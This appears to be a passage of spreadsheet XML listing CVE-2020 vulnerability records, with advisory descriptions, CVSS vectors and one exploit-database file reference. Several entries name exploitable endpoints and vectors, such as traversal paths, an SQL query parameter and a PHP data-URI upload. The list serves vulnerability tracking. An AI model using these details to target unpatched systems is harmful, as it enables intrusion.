  </si>
  <si>
    <t>CVE-2020-5385</t>
  </si>
  <si>
    <t>Dell Encryption versions prior to 10.8 and Dell Endpoint Security Suite versions prior to 2.8 contain a privilege escalation vulnerability because of an incomplete fix for CVE-2020-5358. A local malicious user with low privileges could potentially exploit this vulnerability to gain elevated privilege on the affected system with the help of a symbolic link.</t>
  </si>
  <si>
    <t>CVE-2020-5386</t>
  </si>
  <si>
    <t>Dell EMC ECS, versions prior to 3.5, contains an Exposure of Resource vulnerability. A remote unauthenticated attacker can access the list of DT (Directory Table) objects of all internally running services and gain knowledge of sensitive data of the system.</t>
  </si>
  <si>
    <t>CVE-2020-5387</t>
  </si>
  <si>
    <t>Dell XPS 13 9370 BIOS versions prior to 1.13.1 contains an Improper Exception Handling vulnerability. A local attacker with physical access could exploit this vulnerability to prevent the system from booting until the exploited boot device is removed.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2020-5388</t>
  </si>
  <si>
    <t>Dell Inspiron 15 7579 2-in-1 BIOS versions prior to 1.31.0 contain an Improper SMM communication buffer verification vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:P/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-5389</t>
  </si>
  <si>
    <t>Dell EMC OpenManage Integration for Microsoft System Center (OMIMSSC) for SCCM and SCVMM versions prior to 7.2.1 contain an information disclosure vulnerability. Authenticated low privileged OMIMSCC users may be able to retrieve sensitive information from the logs.</t>
  </si>
  <si>
    <t>CVE-2020-5390</t>
  </si>
  <si>
    <t>PySAML2 before 5.0.0 does not check that the signature in a SAML document is enveloped and thus signature wrapping is effective, i.e., it is affected by XML Signature Wrapping (XSW). The signature information and the node/object that is signed can be in different places and thus the signature verification will succeed, but the wrong data will be used. This specifically affects the verification of assertion that have been signed.</t>
  </si>
  <si>
    <t>CVE-2020-5391</t>
  </si>
  <si>
    <t>Cross-site request forgery (CSRF) vulnerabilities exist in the Auth0 plugin before 4.0.0 for WordPress via the domain field.</t>
  </si>
  <si>
    <t>CVE-2020-5392</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability exists in the Auth0 plugin before 4.0.0 for WordPress via the settings page.</t>
  </si>
  <si>
    <t>CVE-2020-5393</t>
  </si>
  <si>
    <t>In Appspace On-Prem through 7.1.3, an adversary can steal a session token via XSS.</t>
  </si>
  <si>
    <t>CVE-2020-5395</t>
  </si>
  <si>
    <t>FontForge 20190801 has a use-after-free in SFD_GetFontMetaData in sfd.c.</t>
  </si>
  <si>
    <t>CVE-2020-5396</t>
  </si>
  <si>
    <t>VMware GemFire versions prior to 9.10.0, 9.9.2, 9.8.7, and 9.7.6, and VMware Tanzu GemFire for VMs versions prior to 1.11.1 and 1.10.2, when deployed without a SecurityManager, contain a JMX service available which contains an insecure default configuration. This allows a malicious user to create an MLet mbean leading to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-5397</t>
  </si>
  <si>
    <t>Spring Framework, versions 5.2.x prior to 5.2.3 are vulnerable to CSRF attacks through CORS preflight requests that target Spring MVC (spring-webmvc module) or Spring WebFlux (spring-webflux module) endpoints. Only non-authenticated endpoints are vulnerable because preflight requests should not include credentials and therefore requests should fail authentication. However a notable exception to this are Chrome based browsers when using client certificates for authentication since Chrome sends TLS client certificates in CORS preflight requests in violation of spec requirements. No HTTP body can be sent or received as a result of this attack.</t>
  </si>
  <si>
    <t>CVE-2020-5398</t>
  </si>
  <si>
    <t>In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input.</t>
  </si>
  <si>
    <t>CVE-2020-5399</t>
  </si>
  <si>
    <t>Cloud Foundry CredHub, versions prior to 2.5.10, connects to a MySQL database without TLS even when configured to use TLS. A malicious user with access to the network between CredHub and its MySQL database may eavesdrop on database connections and thereby gain unauthorized access to CredHub and other components.</t>
  </si>
  <si>
    <t>CVE-2020-5400</t>
  </si>
  <si>
    <t>Cloud Foundry Cloud Controller (CAPI), versions prior to 1.91.0, logs properties of background jobs when they are run, which may include sensitive information such as credentials if provided to the job. A malicious user with access to those logs may gain unauthorized access to resources protected by such credentials.</t>
  </si>
  <si>
    <t>CVE-2020-5401</t>
  </si>
  <si>
    <t>Cloud Foundry Routing Release, versions prior to 0.197.0, contains GoRouter, which allows malicious clients to send invalid headers, causing caching layers to reject subsequent legitimate clients trying to access the app.</t>
  </si>
  <si>
    <t>CVE-2020-5402</t>
  </si>
  <si>
    <t>In Cloud Foundry UAA, versions prior to 74.14.0, a CSRF vulnerability exists due to the OAuth2 state parameter not being checked in the callback function when authenticating with external identity providers.</t>
  </si>
  <si>
    <t>CVE-2020-5403</t>
  </si>
  <si>
    <t>Reactor Netty HttpServer, versions 0.9.3 and 0.9.4, is exposed to a URISyntaxException that causes the connection to be closed prematurely instead of producing a 400 response.</t>
  </si>
  <si>
    <t>CVE-2020-5404</t>
  </si>
  <si>
    <t>The HttpClient from Reactor Netty, versions 0.9.x prior to 0.9.5, and versions 0.8.x prior to 0.8.16, may be used incorrectly, leading to a credentials leak during a redirect to a different domain. In order for this to happen, the HttpClient must have been explicitly configured to follow redirects.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-5405</t>
  </si>
  <si>
    <t>Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.</t>
  </si>
  <si>
    <t>CVE-2020-5406</t>
  </si>
  <si>
    <t>VMware Tanzu Application Service for VMs, 2.6.x versions prior to 2.6.18, 2.7.x versions prior to 2.7.11, and 2.8.x versions prior to 2.8.5, includes a version of PCF Autoscaling that writes database connection properties to its log, including database username and password. A malicious user with access to those logs may gain unauthorized access to the database being used by Autoscaling.</t>
  </si>
  <si>
    <t>CVE-2020-5407</t>
  </si>
  <si>
    <t>Spring Security versions 5.2.x prior to 5.2.4 and 5.3.x prior to 5.3.2 contain a signature wrapping vulnerability during SAML response validation. When using the spring-security-saml2-service-provider component, a malicious user can carefully modify an otherwise valid SAML response and append an arbitrary assertion that Spring Security will accept as valid.</t>
  </si>
  <si>
    <t>CVE-2020-5408</t>
  </si>
  <si>
    <t>Spring Security versions 5.3.x prior to 5.3.2, 5.2.x prior to 5.2.4, 5.1.x prior to 5.1.10, 5.0.x prior to 5.0.16 and 4.2.x prior to 4.2.16 use a fixed null initialization vector with CBC Mode in the implementation of the queryable text encryptor. A malicious user with access to the data that has been encrypted using such an encryptor may be able to derive the unencrypted values using a dictionary attack.</t>
  </si>
  <si>
    <t>CVE-2020-5409</t>
  </si>
  <si>
    <t>Pivotal Concourse, most versions prior to 6.0.0, allows redirects to untrusted websites in its login flow. A remote unauthenticated attacker could convince a user to click on a link using the OAuth redirect link with an untrusted website and gain access to that user's access token in Concourse. (This issue is similar to, but distinct from, CVE-2018-15798.)</t>
  </si>
  <si>
    <t>CVE-2020-5410</t>
  </si>
  <si>
    <t>Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack.</t>
  </si>
  <si>
    <t>CVE-2020-5411</t>
  </si>
  <si>
    <t>When configured to enable default typing, Jackson contained a deserialization vulnerability that could lead to arbitrary code execution. Jackson fixed this vulnerability by blacklisting known "deserialization gadgets". Spring Batch configures Jackson with global default typing enabled which means that through the previous exploit, arbitrary code could be executed if all of the following is true: * Spring Batch's Jackson support is being leveraged to serialize a job's ExecutionContext. * A malicious user gains write access to the data store used by the JobRepository (where the data to be deserialized is stored). In order to protect against this type of attack, Jackson prevents a set of untrusted gadget classes from being deserialized. Spring Batch should be proactive against blocking unknown "deserialization gadgets" when enabling default typing.</t>
  </si>
  <si>
    <t>CVE-2020-5412</t>
  </si>
  <si>
    <t>Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6, and older unsupported versions allow applications to use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. A malicious user, or attacker, can send a request to other servers that should not be exposed publicly.</t>
  </si>
  <si>
    <t>CVE-2020-5413</t>
  </si>
  <si>
    <t>Spring Integration framework provides Kryo Codec implementations as an alternative for Java (de)serialization. When Kryo is configured with default options, all unregistered classes are resolved on demand. This leads to the "deserialization gadgets" exploit when provided data contains malicious code for execution during deserialization. In order to protect against this type of attack, Kryo can be configured to require a set of trusted classes for (de)serialization. Spring Integration should be proactive against blocking unknown "deserialization gadgets" when configuring Kryo in code.</t>
  </si>
  <si>
    <t>CVE-2020-5414</t>
  </si>
  <si>
    <t>VMware Tanzu Application Service for VMs (2.7.x versions prior to 2.7.19, 2.8.x versions prior to 2.8.13, and 2.9.x versions prior to 2.9.7) contains an App Autoscaler that logs the UAA admin password. This credential is redacted on VMware Tanzu Operations Manager; however, the unredacted logs are available to authenticated users of the BOSH Director. This credential would grant administrative privileges to a malicious user. The same versions of App Autoscaler also log the App Autoscaler Broker password. Prior to newer versions of Operations Manager, this credential was not redacted from logs. This credential allows a malicious user to create, delete, and modify App Autoscaler services instances. Operations Manager started redacting this credential from logs as of its versions 2.7.15, 2.8.6, and 2.9.1. Note that these logs are typically only visible to foundation administrators and operators.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2020-5415</t>
  </si>
  <si>
    <t>Concourse, versions prior to 6.3.1 and 6.4.1, in installations which use the GitLab auth connector, is vulnerable to identity spoofing by way of configuring a GitLab account with the same full name as another user who is granted access to a Concourse team. GitLab groups do not have this vulnerability, so GitLab users may be moved into groups which are then configured in the Concourse team.</t>
  </si>
  <si>
    <t>CVE-2020-5416</t>
  </si>
  <si>
    <t>Cloud Foundry Routing (Gorouter), versions prior to 0.204.0, when used in a deployment with NGINX reverse proxies in front of the Gorouters, is potentially vulnerable to denial-of-service attacks in which an unauthenticated malicious attacker can send specially-crafted HTTP requests that may cause the Gorouters to be dropped from the NGINX backend pool.</t>
  </si>
  <si>
    <t>CVE-2020-5417</t>
  </si>
  <si>
    <t>Cloud Foundry CAPI (Cloud Controller), versions prior to 1.97.0, when used in a deployment where an app domain is also the system domain (which is true in the default CF Deployment manifest), were vulnerable to developers maliciously or accidentally claiming certain sensitive routes, potentially resulting in the developer's app handling some requests that were expected to go to certain system components.</t>
  </si>
  <si>
    <t>CVE-2020-5418</t>
  </si>
  <si>
    <t>Cloud Foundry CAPI (Cloud Controller) versions prior to 1.98.0 allow authenticated users having only the "cloud_controller.read" scope, but no roles in any spaces, to list all droplets in all spaces (whereas they should see none).</t>
  </si>
  <si>
    <t>CVE-2020-5419</t>
  </si>
  <si>
    <t>RabbitMQ versions 3.8.x prior to 3.8.7 are prone to a Windows-specific binary planting security vulnerability that allows for arbitrary code execution. An attacker with write privileges to the RabbitMQ installation directory and local access on Windows could carry out a local binary hijacking (planting) attack and execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-5420</t>
  </si>
  <si>
    <t>Cloud Foundry Routing (Gorouter) versions prior to 0.206.0 allow a malicious developer with "cf push" access to cause denial-of-service to the CF cluster by pushing an app that returns specially crafted HTTP responses that crash the Gorouters.</t>
  </si>
  <si>
    <t>CVE-2020-5421</t>
  </si>
  <si>
    <t>In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-5422</t>
  </si>
  <si>
    <t>BOSH System Metrics Server releases prior to 0.1.0 exposed the UAA password as a flag to a process running on the BOSH director. It exposed the password to any user or process with access to the same VM (through ps or looking at process details).</t>
  </si>
  <si>
    <t>CVE-2020-5423</t>
  </si>
  <si>
    <t>CAPI (Cloud Controller) versions prior to 1.101.0 are vulnerable to a denial-of-service attack in which an unauthenticated malicious attacker can send specially-crafted YAML files to certain endpoints, causing the YAML parser to consume excessive CPU and RAM.</t>
  </si>
  <si>
    <t>CVE-2020-5425</t>
  </si>
  <si>
    <t>Single Sign-On for Vmware Tanzu all versions prior to 1.11.3 ,1.12.x versions prior to 1.12.4 and 1.13.x prior to 1.13.1 are vulnerable to user impersonation attack.If two users are logged in to the SSO operator dashboard at the same time, with the same username, from two different identity providers, one can acquire the token of the other and thus operate with their permissions. Note: Foundation may be vulnerable only if: 1) The system zone is set up to use a SAML identity provider 2) There are internal users that have the same username as users in the external SAML provider 3) Those duplicate-named users have the scope to access the SSO operator dashboard 4) The vulnerability doesn't appear with LDAP because of chained authentication.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-5426</t>
  </si>
  <si>
    <t>Scheduler for TAS prior to version 1.4.0 was permitting plaintext transmission of UAA client token by sending it over a non-TLS connection. This also depended on the configuration of the MySQL server which is used to cache a UAA client token used by the service. If intercepted the token can give an attacker admin level access in the cloud controller.</t>
  </si>
  <si>
    <t>CVE-2020-5427</t>
  </si>
  <si>
    <t>In Spring Cloud Data Flow, versions 2.6.x prior to 2.6.5, versions 2.5.x prior 2.5.4, an application is vulnerable to SQL injection when requesting task execution.</t>
  </si>
  <si>
    <t>CVE-2020-5428</t>
  </si>
  <si>
    <t>In applications using Spring Cloud Task 2.2.4.RELEASE and below, may be vulnerable to SQL injection when exercising certain lookup queries in the TaskExplorer.</t>
  </si>
  <si>
    <t>CVE-2020-5496</t>
  </si>
  <si>
    <t>FontForge 20190801 has a heap-based buffer overflow in the Type2NotDefSplines() function in splinesave.c.</t>
  </si>
  <si>
    <t>CVE-2020-5497</t>
  </si>
  <si>
    <t>The OpenID Connect reference implementation for MITREid Connect through 1.3.3 allows XSS due to userInfoJson being included in the page unsanitized. This is related to header.tag. The issue can be exploited to execute arbitrary JavaScript.</t>
  </si>
  <si>
    <t>CVE-2020-5499</t>
  </si>
  <si>
    <t>Baidu Rust SGX SDK through 1.0.8 has an enclave ID race. There are non-deterministic results in which, sometimes, two global IDs are the same.</t>
  </si>
  <si>
    <t>CVE-2020-5501</t>
  </si>
  <si>
    <t>phpBB 3.2.8 allows a CSRF attack that can modify a group avatar.</t>
  </si>
  <si>
    <t>CVE-2020-5502</t>
  </si>
  <si>
    <t>phpBB 3.2.8 allows a CSRF attack that can approve pending group memberships.</t>
  </si>
  <si>
    <t>CVE-2020-5504</t>
  </si>
  <si>
    <t>In phpMyAdmin 4 before 4.9.4 and 5 before 5.0.1, SQL injection exists in the user accounts page. A malicious user could inject custom SQL in place of their own username when creating queries to this page. An attacker must have a valid MySQL account to access the server.</t>
  </si>
  <si>
    <t>CVE-2020-5505</t>
  </si>
  <si>
    <t>Freelancy v1.0.0 allows remote command execution via the "file":"data:application/x-php;base64 substring (in conjunction with "type":"application/x-php"} to the /api/files/ URI.</t>
  </si>
  <si>
    <t>CVE-2020-5509</t>
  </si>
  <si>
    <t>PHPGurukul Car Rental Project v1.0 allows Remote Code Execution via an executable file in an upload of a new profile image.</t>
  </si>
  <si>
    <t>CVE-2020-5510</t>
  </si>
  <si>
    <t>PHPGurukul Hostel Management System v2.0 allows SQL injection via the id parameter in the full-profile.php file.</t>
  </si>
  <si>
    <t>CVE-2020-5511</t>
  </si>
  <si>
    <t>PHPGurukul Small CRM v2.0 was found vulnerable to authentication bypass via SQL injection when logging into the administrator login page.</t>
  </si>
  <si>
    <t>CVE-2020-5512</t>
  </si>
  <si>
    <t>Gila CMS 1.11.8 allows /admin/media?path=../ Path Traversal.</t>
  </si>
  <si>
    <t>CVE-2020-5513</t>
  </si>
  <si>
    <t>Gila CMS 1.11.8 allows /cm/delete?t=../ Directory Traversal.</t>
  </si>
  <si>
    <t>CVE-2020-5514</t>
  </si>
  <si>
    <t>Gila CMS 1.11.8 allows Unrestricted Upload of a File with a Dangerous Type via .phar or .phtml to the lzld/thumb?src= URI.</t>
  </si>
  <si>
    <t>CVE-2020-5515</t>
  </si>
  <si>
    <t>Gila CMS 1.11.8 allows /admin/sql?query= SQL Injection.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48590.py</t>
  </si>
  <si>
    <t>Gila CMS 1.11.8 - 'query' SQL Injection</t>
  </si>
  <si>
    <t>2020-06-16</t>
  </si>
  <si>
    <t>CVE-2020-5517</t>
  </si>
  <si>
    <t>CSRF in the /login URI in BlueOnyx 5209R allows an attacker to access the dashboard and perform scraping or other analysis.</t>
  </si>
  <si>
    <t>CVE-2020-5519</t>
  </si>
  <si>
    <t>The WebAdmin Console in OpenLiteSpeed before v1.6.5 does not strictly check request URLs, as demonstrated by the "Server Configuration &gt; External App" screen.</t>
  </si>
  <si>
    <t>CVE-2020-5520</t>
  </si>
  <si>
    <t>The netprint App for iOS 3.2.3 and earlier does not verify X.509 certificates from servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.</t>
  </si>
  <si>
    <t>CVE-2020-5521</t>
  </si>
  <si>
    <t>The kantan netprint App for iOS 2.0.2 and earlier does not verify X.509 certificates from servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.</t>
  </si>
  <si>
    <t>CVE-2020-5522</t>
  </si>
  <si>
    <t>The kantan netprint App for Android 2.0.3 and earlier does not verify X.509 certificates from servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.</t>
  </si>
  <si>
    <t>CVE-2020-5523</t>
  </si>
  <si>
    <t>Android App 'MyPallete' and some of the Android banking applications based on 'MyPallete' do not verify X.509 certificates from servers, and also do not properly validate certificates with host-mismatch, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.</t>
  </si>
  <si>
    <t>CVE-2020-5524</t>
  </si>
  <si>
    <t>Aterm series (Aterm WF1200C firmware Ver1.2.1 and earlier, Aterm WG1200CR firmware Ver1.2.1 and earlier, Aterm WG2600HS firmware Ver1.3.2 and earlier) allows an attacker on the same network segment to execute arbitrary OS commands with root privileges via UPnP function.</t>
  </si>
  <si>
    <t>CVE-2020-5525</t>
  </si>
  <si>
    <t>Aterm series (Aterm WF1200C firmware Ver1.2.1 and earlier, Aterm WG1200CR firmware Ver1.2.1 and earlier, Aterm WG2600HS firmware Ver1.3.2 and earlier) allows an authenticated attacker on the same network segment to execute arbitrary OS commands with root privileges via management screen.</t>
  </si>
  <si>
    <t>CVE-2020-5526</t>
  </si>
  <si>
    <t>The AWMS Mobile App for Android 2.0.0 to 2.0.5 and for iOS 2.0.0 to 2.0.8 does not verify X.509 certificates from servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.</t>
  </si>
  <si>
    <t>CVE-2020-5527</t>
  </si>
  <si>
    <t>When MELSOFT transmission port (UDP/IP) of Mitsubishi Electric MELSEC iQ-R series (all versions), MELSEC iQ-F series (all versions), MELSEC Q series (all versions), MELSEC L series (all versions), and MELSEC F series (all versions) receives massive amount of data via unspecified vectors, resource consumption occurs and the port does not process the data properly. As a result, it may fall into a denial-of-service (DoS) condition. The vendor states this vulnerability only affects Ethernet communication functions.</t>
  </si>
  <si>
    <t>CVE-2020-5528</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in Movable Type series (Movable Type 7 r.4603 and earlier (Movable Type 7), Movable Type 6.5.2 and earlier (Movable Type 6.5), Movable Type Advanced 7 r.4603 and earlier (Movable Type Advanced 7), Movable Type Advanced 6.5.2 and earlier (Movable Type Advanced 6.5), Movable Type Premium 1.26 and earlier (Movable Type Premium), and Movable Type Premium Advanced 1.26 and earlier (Movable Type Premium Advanced)) allows remote attackers to inject arbitrary web script or HTML in the block editor and the rich text editor via a specially crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-5529</t>
  </si>
  <si>
    <t>HtmlUnit prior to 2.37.0 contains code execution vulnerabilities. HtmlUnit initializes Rhino engine improperly, hence a malicious JavScript code can execute arbitrary Java code on the application. Moreover, when embedded in Android application, Android-specific initialization of Rhino engine is done in an improper way, hence a malicious JavaScript code can execute arbitrary Java code on the application.</t>
  </si>
  <si>
    <t>CVE-2020-5530</t>
  </si>
  <si>
    <t>Cross-site request forgery (CSRF) vulnerability in Easy Property Listings versions prior to 3.4 allows remote attackers to hijack the authentication of administrators via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5531</t>
  </si>
  <si>
    <t>Mitsubishi Electric MELSEC C Controller Module and MELIPC Series MI5000 MELSEC-Q Series C Controller Module(Q24DHCCPU-V, Q24DHCCPU-VG User Ethernet port (CH1, CH2): First 5 digits of serial number 21121 or before), MELSEC iQ-R Series C Controller Module / C Intelligent Function Module(R12CCPU-V Ethernet port (CH1, CH2): First 2 digits of serial number 11 or before, and RD55UP06-V Ethernet port: First 2 digits of serial number 08 or before), and MELIPC Series MI5000(MI5122-VW Ethernet port (CH1): First 2 digits of serial number 03 or before, or the firmware version 03 or before) allow remote attackers to cause a denial of service and/or malware being executed via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5532</t>
  </si>
  <si>
    <t>ilbo App (ilbo App for Android prior to version 1.1.8 and ilbo App for iOS prior to version 1.2.01) allows an attacker on the same network segment to bypass authentication and to view the images which were recorded by the other ilbo user's device via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5533</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in Aterm WG2600HS firmware Ver1.3.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5534</t>
  </si>
  <si>
    <t>Aterm WG2600HS firmware Ver1.3.2 and earlier allows an authenticated attacker on the same network segment to execute arbitrary OS commands with root privileges via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5535</t>
  </si>
  <si>
    <t>OpenBlocks IoT VX2 prior to Ver.4.0.0 (Ver.3 Series) allows an attacker on the same network segment to execute arbitrary OS commands with root privileges via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5536</t>
  </si>
  <si>
    <t>OpenBlocks IoT VX2 prior to Ver.4.0.0 (Ver.3 Series) allows an attacker on the same network segment to bypass authentication and to initialize the device via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5537</t>
  </si>
  <si>
    <t>Cybozu Desktop for Windows 2.0.23 to 2.2.40 allows remote code execution via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5538</t>
  </si>
  <si>
    <t>Improper Access Control in PALLET CONTROL Ver. 6.3 and earlier allows authenticated attackers to execute arbitrary code with the SYSTEM privilege on the computer where PALLET CONTROL is installed via unspecified vectors. PalletControl 7 to 9.1 are not affected by this vulnerability, however under the environment where PLS Management Add-on Module is used, all versions are affected.</t>
  </si>
  <si>
    <t>CVE-2020-5539</t>
  </si>
  <si>
    <t>GRANDIT Ver.1.6, Ver.2.0, Ver.2.1, Ver.2.2, Ver.2.3, and Ver.3.0 do not properly manage sessions, which allows remote attackers to impersonate an arbitrary user and then alter or disclose the information via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5540</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in CyberMail Ver.6.x and Ver.7.x allows remote attackers to inject arbitrary script or HTML via a specially crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-5541</t>
  </si>
  <si>
    <t>Open redirect vulnerability in CyberMail Ver.6.x and Ver.7.x allows remote attackers to redirect users to arbitrary sites and conduct phishing attacks via a specially crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-5542</t>
  </si>
  <si>
    <t>Buffer error vulnerability in TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows remote attackers to stop the network functions or execute malware via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5543</t>
  </si>
  <si>
    <t>TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier does not properly manage sessions, which allows remote attackers to stop the network functions or execute malware via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5544</t>
  </si>
  <si>
    <t>Null Pointer Dereference vulnerability in TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows remote attackers to stop the network functions or execute malware via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5545</t>
  </si>
  <si>
    <t>TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows remote attackers to bypass access restriction and to stop the network functions or execute malware via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5546</t>
  </si>
  <si>
    <t>Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows an attacker on the same network segment to stop the network functions or execute malware via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5547</t>
  </si>
  <si>
    <t>Resource Management Errors vulnerability in TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows remote attackers to stop the network functions or execute malware via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5548</t>
  </si>
  <si>
    <t>Yamaha LTE VoIP Router(NVR700W firmware Rev.15.00.15 and earlier), Yamaha Gigabit VoIP Router(NVR510 firmware Rev.15.01.14 and earlier), Yamaha Gigabit VPN Router(RTX810 firmware Rev.11.01.33 and earlier, RTX830 firmware Rev.15.02.09 and earlier, RTX1200 firmware Rev.10.01.76 and earlier, RTX1210 firmware Rev.14.01.33 and earlier, RTX3500 firmware Rev.14.00.26 and earlier, and RTX5000 firmware Rev.14.00.26 and earlier), Yamaha Broadband VoIP Router(NVR500 firmware Rev.11.00.38 and earlier), and Yamaha Firewall(FWX120 firmware Rev.11.03.27 and earlier) allow remote attackers to cause a denial of service via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5549</t>
  </si>
  <si>
    <t>Cross-site request forgery (CSRF) vulnerability in EasyBlocks IPv6 Ver. 2.0.1 and earlier and Enterprise Ver. 2.0.1 and earlier allows remote attackers to hijack the authentication of administrators via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5550</t>
  </si>
  <si>
    <t>Session fixation vulnerability in EasyBlocks IPv6 Ver. 2.0.1 and earlier, and Enterprise Ver. 2.0.1 and earlier allows remote attackers to impersonate a registered user and log in the management console, that may result in information alteration/disclosure via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5551</t>
  </si>
  <si>
    <t>Toyota 2017 Model Year DCU (Display Control Unit) allows an unauthenticated attacker within Bluetooth range to cause a denial of service attack and/or execute an arbitrary command. The affected DCUs are installed in Lexus (LC, LS, NX, RC, RC F), TOYOTA CAMRY, and TOYOTA SIENNA manufactured in the regions other than Japan from Oct. 2016 to Oct. 2019. An attacker with certain knowledge on the target vehicle control system may be able to send some diagnostic commands to ECUs with some limited availability impacts; the vendor states critical vehicle controls such as driving, turning, and stopping are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-5552</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in mailform version 1.04 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5553</t>
  </si>
  <si>
    <t>mailform version 1.04 allows remote attackers to execute arbitrary PHP code via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5554</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in Shihonkanri Plus GOOUT Ver1.5.8 and Ver2.2.10 allows remote attackers to read and write arbitrary files via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5555</t>
  </si>
  <si>
    <t>Shihonkanri Plus GOOUT Ver1.5.8 and Ver2.2.10 allows remote attackers to read and write data of the files placed in the same directory where it is placed via unspecified vector due to the improper input validation issue.</t>
  </si>
  <si>
    <t>CVE-2020-5556</t>
  </si>
  <si>
    <t>Shihonkanri Plus GOOUT Ver1.5.8 and Ver2.2.10 allows remote attackers to execute arbitrary OS commands via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5557</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in CuteNews 2.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5558</t>
  </si>
  <si>
    <t>CuteNews 2.0.1 allows remote authenticated attackers to execute arbitrary PHP code via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5559</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in WL-Enq 1.11 and 1.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5560</t>
  </si>
  <si>
